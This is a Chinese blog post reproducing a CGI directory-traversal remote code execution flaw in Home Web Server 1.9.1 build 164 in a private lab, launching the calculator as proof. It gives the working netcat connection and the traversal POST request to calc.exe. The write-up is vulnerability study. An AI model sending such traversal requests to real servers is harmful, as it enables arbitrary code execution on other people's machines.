码迷,mamicode.com
首页 > Web开发 > 详细

Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

时间:2017-08-29 23:46:41      阅读:315      评论:0      收藏:0      [点我收藏+]

标签:利用   参考   png   cal   kali   exploit   访问   server   漏洞   

一、  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

漏洞描述:

Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序。

漏洞影响范围:

Home Web Server 1.9.1 build 164

漏洞复现:

利用原理:

NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164的主机就会自动打开计算器程序。

环境搭建:

攻击机:Kali-Linux-2017.1-vm-amd64     IP:192.168.18.250

靶机:Windows 10 Version 1703(x64)   IP:192.168.18.112

Windows10系统中安装并打开Home Web Server 1.9.1 build 164

 技术分享

Kali中使用NC建立连接,命令为:nc 192.168.18.112 80

发送POST请求:POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

技术分享

当返回400响应时,按Ctrl+C终止请求,此时可以看到windows10自动打开了计算器程序

 技术分享

参考链接:https://www.exploit-db.com/exploits/42128/

Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

标签:利用   参考   png   cal   kali   exploit   访问   server   漏洞   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7450797.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!